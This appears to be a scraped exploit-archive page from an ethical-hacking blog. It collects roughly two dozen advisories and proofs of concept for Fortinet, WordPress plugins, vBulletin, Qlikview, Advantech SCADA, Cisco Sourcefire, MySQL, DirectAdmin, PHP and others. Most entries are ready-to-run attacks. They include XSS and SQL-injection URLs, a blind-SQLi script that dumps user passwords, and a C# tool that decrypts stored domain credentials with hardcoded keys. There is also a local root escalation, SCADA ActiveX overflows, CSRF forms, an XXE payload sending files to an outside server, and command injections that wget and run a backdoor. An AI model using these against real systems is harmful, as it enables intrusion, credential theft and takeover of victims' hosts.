source: https://www.securityfocus.com/bid/56774/info
Multiple Fortinet FortiWeb Appliances are prone to multiple cross-site scripting vulnerabilities because they fail to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
The following FortiWeb application series are vulnerable:
FortiWeb-4000C
FortiWeb-3000C/3000CFsx
FortiWeb-1000C
FortiWeb-400C and
FortiWeb Virtual Appliance
https://www.example.com/waf/pcre_expression/validate?redir=/success&mkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C
https://www.example.com/waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C&mkey=0
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863293098
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/56767/info
TinyMCPUK is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
TinyMCPUK 0.3 is vulnerable; other versions may also be affected.
http://www.example.com/filemanager/connectors/php/connector.php?test=<h1>p0c</h1>&xss=<script>alert(document.cookie)</script>
source: https://www.securityfocus.com/bid/56777/info
The Zingiri Forums plugin for WordPress is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.
http://www.example.com/wp-content/plugins/zingiri-forum/mybb/memberlist.php?language=[Directory or file]
source: https://www.securityfocus.com/bid/56792/info
The Nest theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/themes/nest/gerador_galeria.php?codigo=[Sqli]
source: https://www.securityfocus.com/bid/56800/info
Newscoop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Newscoop 4.0.2 is vulnerable; other versions may also be affected.
Script: /admin/password_recovery.php
Payload: f_post_sent=1&f_email=example@example.com' and (select if(substr(password_reset_token,15,1)='1',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password
# Exploit Title: Wordpress White-Label Framework XSS
# Google Dork: inurl:/wp-content/themes/whitelabel-framework/inc/form-sharebymail_iframe.php
# Date: 7 September 2015
# Exploit Author: Outlasted
# Software Link: wordpress.com / http://whitelabelframework.com/
# Version: 2.0.6
#Greetz to: TeaMp0isoN
=====================================================
Vulnerable url: /wp-content/themes/whitelabel-framework/inc/form-sharebymail_iframe.php
=====================================================
How to exploit?
----------------------------------------------------------------------------------------------------------
Enter your XSS payload in all forms and watch the magic.
IBM AIX High Availability Cluster Multiprocessing (HACMP) LPE to root 0day
Let's kill some more bugs today and force vendor improvement :)
"""
$ cat /tmp/su
#!/bin/sh
/bin/sh
$ chmod +x /tmp/su
$ PATH=/tmp /usr/es/sbin/cluster/utilities/clpasswd
# /usr/bin/whoami
root
"""
References:
https://en.wikipedia.org/wiki/IBM_High_Availability_Cluster_Multiprocessing
http://www-01.ibm.com/support/knowledgecenter/SSPHQG_6.1.0/com.ibm.hacmp.admngd/ha_admin_clpasswd.htm
--
Kristian Erik Hermansen (@h3rm4ns3c)
https://www.linkedin.com/in/kristianhermansen
--
/*
Cisco Sourcefire User Agent Insecure File Permissions Vulnerability
Vendor: Cisco
Product webpage: http://www.cisco.com
Affected version(s):
Cisco SF User Agent 2.2
Fixed version(s):
Cisco SF User Agent 2.2-25
Date: 08/09/2015
Credits: Glafkos Charalambous
CVE: Not assigned by Cisco
BugId: CSCut44881
Disclosure Timeline:
18-03-2015: Vendor Notification
19-03-2015: Vendor Response/Feedback
01-09-2015: Vendor Fix/Patch
08-09-2015: Public Disclosure
Description:
Sourcefire User Agent monitors Microsoft Active Directory servers and report logins and logoffs authenticated via LDAP.
The FireSIGHT System integrates these records with the information it collects via direct network traffic observation by managed devices.
Vulnerability:
Sourcefire User Agent is vulnerable to default insecure file permissions and hardcoded encryption keys.
A local attacker can exploit this by gaining access to user readable database file and extracting sensitive information.
In combination with hard-coded 3DES keys an attacker is able to decrypt configured Domain Controller accounts which can lead
to further attacks.
C:\Users\0x414141>icacls "C:\SourcefireUserAgent.sdf"
C:\SourcefireUserAgent.sdf BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
Mandatory Label\High Mandatory Level:(I)(NW)
Successfully processed 1 files; Failed processing 0 files
*/
using System;
using System.Text;
using System.Security.Cryptography;
using System.Data.SqlServerCe;
namespace SFDecrypt
{
class Program
{
static void Main(string[] args)
{
SqlCeConnection conn = null;
try
{
string FileName = @"C:\SourcefireUserAgent.sdf";
string ConnectionString = string.Format("DataSource=\"{0}\";Mode = Read Only;Temp Path =C:\\Windows\\Temp", FileName);
conn = new SqlCeConnection(ConnectionString);
string query = "Select host, domain, username, password FROM active_directory_servers";
SqlCeCommand cmd = new SqlCeCommand(query, conn);
conn.Open();
SqlCeDataReader rdr = cmd.ExecuteReader();
while (rdr.Read())
{
string strHost = rdr.GetString(0);
string strDom = rdr.GetString(1);
string strUser = rdr.GetString(2);
string strPass = rdr.GetString(3);
Console.WriteLine("Host: " + strHost + " Domain: " + strDom + " Username: " + strUser + " Password: " + Decrypt.Decrypt3DES(strPass));
}
rdr.Close();
}
catch (Exception exception)
{
Console.Write(exception.ToString());
}
finally
{
conn.Close();
}
}
}
class Decrypt
{
public static string Decrypt3DES(string strEncrypted)
{
string strDecrypted = "";
try
{
TripleDESCryptoServiceProvider provider = new TripleDESCryptoServiceProvider();
provider.Key = Encoding.UTF8.GetBytes("50uR<3F1r3R0xDaH0u5eW0o+");
provider.IV = Encoding.UTF8.GetBytes("53cUri+y");
byte[] inputBuffer = Convert.FromBase64String(strEncrypted);
byte[] bytes = provider.CreateDecryptor().TransformFinalBlock(inputBuffer, 0, inputBuffer.Length);
strDecrypted = Encoding.Unicode.GetString(bytes);
}
catch (Exception exception)
{
Console.Write("Error Decrypting Data: " + exception.Message);
}
return strDecrypted;
}
}
}
References:
https://tools.cisco.com/bugsearch/bug/CSCut44881
Introduction
*********************************************************************************
Using Advantech WebAccess SCADA Software we can remotely manage Industrial
Control systems devices like RTU's, Generators, Motors etc. Attackers can
execute code remotely by passing maliciously crafted string to
ConvToSafeArray API in ASPVCOBJLib.AspDataDriven ActiveX.
Operating System: Windows SP1
Affected Product: Advantech WebAccess 8.0, 3.4.3
Vulnerable Program: AspVCObj.dll
CVE-2014-9208
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
UpdateProject Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:3703BA5D-7329-4E60-A1A5-AE7D6DF267C1' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\webdobj.dll"
prototype = "Sub UpdateProject ( ByVal WwwPort As String , ByVal ProjName
As String , ByVal ProjIP As String , ByVal ProjPort As Long , ByVal
ProjTimeout As Long , ByVal ProjDir As String )"
-->
arg1="defaultV"
arg2="defaultV"
arg3=String(1044, "A")
arg4=1
arg5=1
arg6="defaultV"
target.UpdateProject arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6
</script></html>
</html>
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
InterfaceFilter Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function InterfaceFilter ( ByVal Interface As String ) As
String"
-->
arg1=String(1044, "A")
target.InterfaceFilter arg1
</script></html>
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
FileProcess Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Sub FileProcess ( ByVal Type As Integer , ByVal FileName As
String )"
-->
arg1=1
arg2=String(1044, "A")
target.FileProcess arg1 ,arg2
</script></html>
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
GetWideStrCpy Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function GetWideStrCpy ( ByVal Type As Integer , ByVal inStr
As String ) As String"
-->
arg1=1
arg2=String(1044, "A")
target.GetWideStrCpy arg1 ,arg2
</script></html>
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
GetRecipeInfo Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function GetRecipeInfo ( ByVal Type As Integer , ByVal
filePath As String )"
-->
arg1=1
arg2=String(1044, "A")
target.GetRecipeInfo arg1 ,arg2
</script></html>
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
GetLastTagNbr Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function GetLastTagNbr ( ByVal TagName As String ) As String"
-->
arg1=String(1044, "A")
target.GetLastTagNbr arg1
</script></html>
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
ConvToSafeArray Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function ConvToSafeArray ( ByVal ArrSize As Integer , ByVal
inStr As String )"
-->
arg1=1
arg2=String(2068, "A")
target.ConvToSafeArray arg1 ,arg2
</script></html>
*********************************************************************************
Vulnerabilities were reported to Advantech sometime in January/February
2015, coordinated through CSOC.From April 2015 they has been postponing the
fix.
source: https://www.securityfocus.com/bid/56837/info
MySQL and MariaDB are prone to a security-bypass weakness.
An attacker may be able to exploit this issue to aid in brute-force attacks; other attacks may also be possible.
use Net::MySQL;
$|=1;
my $mysql = Net::MySQL->new(
hostname => '192.168.2.3',
database => 'test',
user => "user",
password => "secret",
debug => 0,
);
$crackuser = "crackme";
while(<stdin>) {
chomp;
$currentpass = $_;
$vv = join "\0",
$crackuser,
"\x14".
Net::MySQL::Password->scramble(
$currentpass, $mysql->{salt}, $mysql->{client_capabilities}
) . "\0";
if ($mysql->_execute_command("\x11", $vv) ne undef) {
print "[*] Cracked! --> $currentpass\n";
exit;
}
}
---
example session:
C:\Users\kingcope\Desktop>C:\Users\kingcope\Desktop\john179\run\jo
hn --incremental --stdout=5 | perl mysqlcrack.pl
Warning: MaxLen = 8 is too large for the current hash type, reduced to 5
words: 16382 time: 0:00:00:02 w/s: 6262 current: citcH
words: 24573 time: 0:00:00:04 w/s: 4916 current: rap
words: 40956 time: 0:00:00:07 w/s: 5498 current: matc3
words: 49147 time: 0:00:00:09 w/s: 5030 current: 4429
words: 65530 time: 0:00:00:12 w/s: 5354 current: ch141
words: 73721 time: 0:00:00:14 w/s: 5021 current: v3n
words: 90104 time: 0:00:00:17 w/s: 5277 current: pun2
[*] Cracked! --> pass
words: 98295 time: 0:00:00:18 w/s: 5434 current: 43gs
Session aborted
source: https://www.securityfocus.com/bid/56860/info
The Simple Gmail Login plugin for Wordpress is prone to an information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
Simple Gmail Login 1.1.3 and prior are vulnerable.
Fatal error: Uncaught exception 'Exception' with message
'DateTimeZone::__construct() [<a
href='datetimezone.--construct'>datetimezone.--construct</a>]: Unknown or bad timezone ()' in
C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php:229
Stack trace: #0
C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php(229):
DateTimeZone->__construct('') #1
C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php(210):
SimpleGmail_Plugin->log('Plugin activate...', false) #2 [internal
function]: SimpleGmail_Plugin->activate('') #3
C:\xampp\htdocs\wordpress\wp-includes\plugin.php(403):
call_user_func_array(Array, Array) #4
C:\xampp\htdocs\wordpress\wp-admin\plugins.php(157):
do_action('activate_simple...') #5 {main} thrown in C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php
on line 229
=============================================================================
[+] Exploit Title : DirectAdmin Web Control Panel CSRF/XSS vulnerability
[+] Exploit Author : Ashiyane Digital Security Team
[+] Date : 1.483
[+] Version : 2015/09/08
[+] Tested on : Elementary Os
[+] Vendor Homepage : http://www.directadmin.com/
=============================================================================
[+] Introduction :
DirectAdmin is a graphical web-based web hosting control panel designed to make administration of websites easier.
DirectAdmin suffers from cross site request forgery and cross site scripting vulnerabilities
=============================================================================
[+] CMD_FILE_MANAGER :
[+] Users : Users are web hosting clients. They use DirectAdmin to configure their web site
[+] Exploit 1: Create New File and Edit a file
<form name=info action='http://address:port/CMD_FILE_MANAGER' method='POST'>
<input type="hidden" name="action" value="edit">
<input type="hidden" name="path" value="/domains/address/public_html">
<input type="hidden" name="text" value="<?php //codes ?>">
<input type="hidden" name="filename" value="index.php">
<input type="submit" onClick="save=0;" value="Save As">
-----------------------------------------------------------------------------
[+] Exploit 2: Create a New Folder
<form name=folderform action="/CMD_FILE_MANAGER" method="POST">
<input type="hidden name=action value="folder">
<input type="hidden name="path" value="/domains/iceschool.ir/public_html">
<input type="hidden" name="name" value="Folder">
<input type=submit value="Create">
</form>
-----------------------------------------------------------------------------
[+] Exploit 3: Rename a file
<form name=info action='http://address:port/CMD_FILE_MANAGER' method='POST'>
<input type=hidden name=action value="rename">
<input type="hidden" name="path" value="/domains/address/public_html">
<input type="hidden" name="old" value="Oldname">
<input type="hidden" name="filename" value="Newname">
<input type="hidden" name="overwrite" value="yes">
<input type="submit" value="Rename">
</form>
-----------------------------------------------------------------------------
[+] Exploit 4 : Reflected XSS
<form name='info' action='http://address:port/CMD_FILE_MANAGER' method='POST'>
<input type="hidden" name="action" value="edit">
<input type="hidden" name="path" value='/xss/"><script>alert(/XSS Vuln/)</script>'>
<input type="hidden" name="text" value="xss">
<input type="hidden" name="filename" value="xss">
<input type="submit" onClick="save=0;" value="Save As">
</form>
=============================================================================
[+] CMD_FTP :
[+] Users : Users are web hosting clients. They use DirectAdmin to configure their web site
[+] Exploit : Create FTP account
<form name="reseller" action="http://address:port/CMD_FTP" method="post">
<input style="display:none" type="text" name="fakeusernameremembered"/>
<input style="display:none" type="password" name="fakepasswordremembered"/>
<input type="hidden" name="action" value="create">
<input type="hidden" name="domain" value="domain.xyz"> <!-- Example : ashiyane.org -->
<input type="hidden" name="user" value="ehsan">
<input type="hidden" name="passwd" value="pass1234">
<input type="hidden" name="passwd2" value="pass1234">
<input type="hidden" name="type" value="domain" checked>
<input type="hidden" name="type" value="ftp">
<input type="hidden" name="type" value="user">
<input type="hidden" name="type" value="custom">
<input type="hidden" name="custom_val" value="/home/domain"> <!-- Example : /home/ashiyane -->
<input type="submit" name="create" value="Create">
</form>
=============================================================================
[+] CMD_DB :
[+] Users : Users are web hosting clients. They use DirectAdmin to configure their web site
[+] Exploit : Create new Database
<form name=reseller action="http://address:port/CMD_DB" method="post">
<input type="hidden" name=action value=create>
<input type="hidden" name=domain value="domain.xyz"> <!-- Domain -->
<input type="hidden" name="name" value="dbname"> <!-- Database Name -->
<input type="hidden" name="user" value="ehsan"> <!-- Username -->
<input type="hidden" name="passwd" value="pass1234"> <!-- Password -->
<input type="hidden" name="passwd2" value="pass1234"> <!-- Password -->
<input type="submit" name="create" value="Create">
</form>
=============================================================================
[+] CMD_DB :
[+] Users : Users are web hosting clients. They use DirectAdmin to configure their web site
[+] Exploit : Create new E-Mail Forwarder
<form name=info action="CMD_EMAIL_FORWARDER" method="post">
<input type=hidden name=action value=create>
<input type=hidden name=domain value="domain.xyz"><!-- Domain -->
<input type="hidden" name="user" value="info"> <!-- Forwarder Name -->
<input type="hidden" name="email" value="hehsan979@gmail.com"> <!-- Destination Email -->
<input type="submit" name="create" value="Create">
</form>
=============================================================================
[+] Discovered By : Ehsan Hosseini (hehsan979@gmail.com)
source: https://www.securityfocus.com/bid/56862/info
FOOT Gestion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?page=contacter.php&id=-1 union select 1,2--%20
source: https://www.securityfocus.com/bid/56877/info
The ajaxReg module for vBulletin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
#!/usr/bin/php
<?
# vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit
# https://www.example.com/-4HcW64E57CI/ULWN9mDnK8I/AAAAAAAAABo/cc0UA9eV_ak/s640/11-26-2012%25206-02-5s3%2520AM.png
# livedemo : http://www.example.com/watch?v=LlKaYyJxH7E
# check it : http://www.example.com/vBulletin/clientscript/register.js
function usage ()
{
echo
"\n[+] vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit".
"\n[+] Author: Cold z3ro".
"\n[+] Site : http://www.example.com | www.example.com".
"\n[+] vandor: http://www.example.com/forum/showthread.php?t=144869".
"\n[+] Usage : php 0day.php <hostname> <path> [userid] [key]".
"\n[+] Ex. : php 0day.php www.example.com /vBulletin/ 1 abcdefghijklmnopqrstuvwxyz".
"\n[+] Note. : Its a 0day exploit\n\n";
exit ();
}
function check ($hostname, $path, $field, $pos, $usid, $char)
{
$char = ord ($char);
$inj = 'ajax.php?do=CheckUsername¶m=';
$inj.=
"admin'+and+ascii(substring((SELECT/**/{$field}/**/from/**/user/**/where/**/userid={$usid}),{$pos},1))={$char}/*";
$culr = $hostname.$path.$inj;
$curl = curl_init();
curl_setopt ($curl, CURLOPT_URL, $culr );
curl_setopt($curl, CURLOPT_HEADER, 1);
curl_setopt($curl, CURLOPT_VERBOSE, 0);
ob_start();
curl_exec ($curl);
curl_close ($curl);
$con = ob_get_contents();
ob_end_clean();
if(eregi('Invalid',$con))
return true;
else
return false;
}
function brutechar ($hostname, $path, $field, $usid, $key)
{
$pos = 1;
$chr = 0;
while ($chr < strlen ($key))
{
if (check ($hostname, $path, $field, $pos, $usid, $key [$chr]))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}
}
if (count ($argv) != 4)
usage ();
$hostname = $argv [1];
$path = $argv [2];
$usid = $argv [3];
$key = $argv [4];
if (empty ($key))
$key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
echo "[+] Username: ";
brutechar ($hostname, $path, "username", $usid, $key);
echo "\n[+] Password: ";
brutechar ($hostname, $path, "password", $usid, $key);
echo "\n[+] Done..";
echo "\n[+] It's not fake, its real.";
# word to 1337day.com, stop scaming me
?>
Exploit Title: Qlikview blind XXE security vulnerability
Product: Qlikview
Vulnerable Versions: v11.20 SR11 and previous versions
Tested Version: v11.20 SR4
Advisory Publication: 08/09/2015
Latest Update: 08/09/2015
Vulnerability Type: Improper Restriction of XML External Entity Reference [CWE-611]
CVE Reference: CVE-2015-3623
Credit: Alex Haynes
Advisory Details:
(1) Vendor & Product Description
--------------------------------
Vendor: QLIK
Product & Version:
QlikView v11.20 SR4
Vendor URL & Download:
http://www.qlik.com/us/explore/products/qlikview
Product Description:
"The QlikView Business Discovery platform delivers true self-service BI that empowers business users by driving innovative decision-making."
(2) Vulnerability Details:
--------------------------
The Qlikview platform is vulnerable to XML External Entity (XXE) vulnerabilities. More specifically, the platform
is susceptible to DTD parameter injections, which are also "blind" as the server feeds back no visual response. These vulnerabilities can be exploited
to force Server Side Request Forgeries (SSRF)in multiple protocols, as well as reading and extracting arbitrary files on the server directly.
Proof of concept for XXE [CVE-2015-5361]:
-----------------------------------------
URL: https://<QLIKVIEW>/AccessPoint.aspx
Attack Pattern for SSRF:
------------------------
In POST body:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE update [
<!ENTITY % external SYSTEM "http://yourserver.com">
%external;]>
OR simply
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag PUBLIC "-//WHITE//NINJA//EN" "http://yourserver.com">
As this is a blind XXE, you will see no response from server, but yourserver.com will receive the HTTP request from the Qlikview server. Also works with FTP and HTTPS protocols.
Attack Pattern for reading and extracting arbitrary files:
------------------------------------------
In POST body:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
<!ENTITY % remote SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % dtd SYSTEM "http://yourserver.com/test.dtd">
%dtd;
%send;
]]>
The test.dtd file on yourserver.com will need to contain the following:
Test.dtd
--------
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://yourserver.com/?%remote;'>">
%all;
As the response is blind, you will see no response from the server, but yourserver.com will receive the file contents as part of the URL in lieu of the %remote parameter.
(3) Advisory Timeline:
----------------------
29/04/2015 - First Contact informing vendor of vulnerability
30/04/2015 - Response requesting details of vulnerability. Details sent
05/05/2015 - Vendor indicates issue is under investigation.
06/05/2015 - Vendor confirms vulnerability and has started working on resolving the issue.
20/05/2015 - Vendor confirms root cause has been identified and patch is under internal testing.
08/06/2015 - Vendor confirms patch ready and requests 90 day restraint on vulnerability release to give clients time to patch.
10/06/2015 - Patch 11.20 SR12 released, fixing the vulnerability
08/09/2015 - Public disclosure of vulnerability.
(4)Solution:
------------
Upgrade to QV11.20 SR12 will correct the vulnerability.
(5) Credits:
------------
Discovered by Alex Haynes
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3623
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3623
source: https://www.securityfocus.com/bid/56881/info
Smartphone Pentest Framework is prone to multiple remote command-execution vulnerabilities.
Remote attackers can exploit these issues to execute arbitrary commands within the context of the vulnerable application to gain root access. This may facilitate a complete compromise of an affected computer.
Smartphone Pentest Framework 0.1.3 and 0.1.4 are vulnerable; other versions may also be affected.
1.
<form action="http://www.example.com/cgi-bin/frameworkgui/SEAttack.pl"
method="post" name=f1>
<input type="hidden" name="platformDD2" value='android' />
<input type="hidden" name="hostingPath" value='a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.ch &&
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>
2.
<form action="http://www.example.com/cgi-bin/frameworkgui/CSAttack.pl"
method="post" name=f1>
<input type="hidden" name="hostingPath" value='a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh &&
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>
3.
<form
action="http://www.example.com/cgi-bin/frameworkgui/attachMobileModem.pl"
method="post" name=f1>
<input type="hidden" name="appURLPath" value='a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh &&
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>
4.
<form
action="http://www.example.com/cgi-bin/frameworkgui/guessPassword.pl"
method="post" name=f1>
<input type="hidden" name="ipAddressTB" value='a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh &&
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>
source: https://www.securityfocus.com/bid/56882/info
Simple Invoices is prone to multiple HTML-injection vulnerabilities and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
[http://]www.example.com/simpleinvoices/index.php?module=invoices&view=manage&having=%3C/script%3E%3Cscript%3Ealert%28%27POC%20XSS%27%29;%3C/script%3E%3Cscript%3E
<!--
# Exploit Title: [Auto-exchanger version 5.1.0 Xsrf]
# Date: [2015/06/05]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin : [https://www.linkedin.com/profile/view?id=276969082]
# Vendor Homepage: [www.auto-exchanger.com]
# Version: [Version 5.1.0]
# Demo : www.farhadexchange.com
# CVE : [CVE-2015-6827]
------------------------------------
details:
------------------------------------
auto-exchanger version 5.1.0 suffers from an xsrf vulnerability , attacker
is able to abuse of this vulnerability to change password by a hidden
iframe in another page.
-------------------------------------
Exploit:
-------------------------------------
-->
<html>
<body>
<iframe style="display:none" name="xsrf-frame"></iframe>
<form method='POST' action='http://farhadexchange.com/signup.php'
target="xsrf-frame" id="xsrf-form">
<label id="lbl_error" name="lbl_error" class="ErrorMessage"></label>
<INPUT type="hidden" name="suser" value="victim_user">
<input type="hidden" name="section" value="do_update" />
<label type='hidden' id="n_password0"><span>
<input type='hidden' maxlength="20" size="30" name="password0"
id="password0" value="testpassword123456" > </label>
<input type="hidden" name="rid" value="" />
<label id="n_password">
<input type="hidden" maxlength="20" size="30" name="password1"
id="password1" value="testpassword123456" ></label>
<label id="n_mail">
<INPUT type='hidden' maxLength=60 size=30 name="mail" id="mail"
value="victim_email" type="text">
</label>
<label id="n_country">
<input type='hidden' name="country" id="country" style="width:196;"
value="IR">
</label>
<label id="cid">
<input type='hidden' name='cid' value='2'/>
</label>
<label id="n_curreny_account">
<INPUT type='hidden' maxLength=60 size=30 name="curreny_account"
id="curreny_account" value="" ><br>
</label>
</form>
<script>document.getElementById("xsrf-form").submit()</script>
</body>
</html>
Yet Another Use After Free Vulnerability in unserialize() with SplDoublyLinkedList
Taoguang Chen <[@chtg](http://github.com/chtg)> -
Write Date: 2015.8.27
Release Date: 2015.9.4
A use-after-free vulnerability was discovered in unserialize() with SplDoublyLinkedList object's deserialization and crafted object's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.
Affected Versions
------------
Affected is PHP 5.6 < 5.6.13
Affected is PHP 5.5 < 5.5.29
Affected is PHP 5.4 < 5.4.45
Credits
------------
This vulnerability was disclosed by Taoguang Chen.
Description
------------
while(*p == ':') {
++p;
ALLOC_INIT_ZVAL(elem);
if (!php_var_unserialize(&elem, &p, s + buf_len, &var_hash TSRMLS_CC)) {
zval_ptr_dtor(&elem);
goto error;
}
spl_ptr_llist_push(intern->llist, elem TSRMLS_CC);
}
It has been demonstrated many times before that __wakeup() leads to
ZVAL is freed from memory. However during deserialization will still
allow to use R: or r: to set references to that already freed memory.
It is possible to use-after-free attack and execute arbitrary code
remotely.
Proof of Concept Exploit
------------
The PoC works on standard MacOSX 10.11 installation of PHP 5.6.12.
<?php
class obj {
var $ryat;
function __wakeup() {
$this->ryat = 1;
}
}
$fakezval = ptr2str(1122334455);
$fakezval .= ptr2str(0);
$fakezval .= "\x00\x00\x00\x00";
$fakezval .= "\x01";
$fakezval .= "\x00";
$fakezval .= "\x00\x00";
$inner = 'i:1234;:i:1;';
$exploit = 'a:5:{i:0;i:1;i:1;C:19:"SplDoublyLinkedList":'.strlen($inner).':{'.$inner.'}i:2;O:3:"obj":1:{s:4:"ryat";R:3;}i:3;a:1:{i:0;R:5;}i:4;s:'.strlen($fakezval).':"'.$fakezval.'";}';
$data = unserialize($exploit);
var_dump($data);
function ptr2str($ptr)
{
$out = '';
for ($i = 0; $i < 8; $i++) {
$out .= chr($ptr & 0xff);
$ptr >>= 8;
}
return $out;
}
?>
Test the PoC on the command line:
$ php uafpoc.php
array(5) {
[0]=>
int(1)
[1]=>
&int(1)
[2]=>
object(obj)#2 (1) {
["ryat"]=>
&int(1)
}
[3]=>
array(1) {
[0]=>
int(1122334455) <=== so we can control the memory and create fake ZVAL :)
}
[4]=>
string(24) "?v?B????"
}
Source: https://code.google.com/p/google-security-research/issues/detail?id=464
The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 or 2013.
Attached files:
Original File: 1105668828_orig.xls
Crashing File: 1105668828_crash.xls
Minimized Crashing File: 1105668828_min.xls
The minimized crashing file shows two one bit deltas from the original file. The first delta at offset 0x1CF7E and the second is at offset 0x3A966. Both of these offset appear to be BIFFRecord lengths.
File Versions:
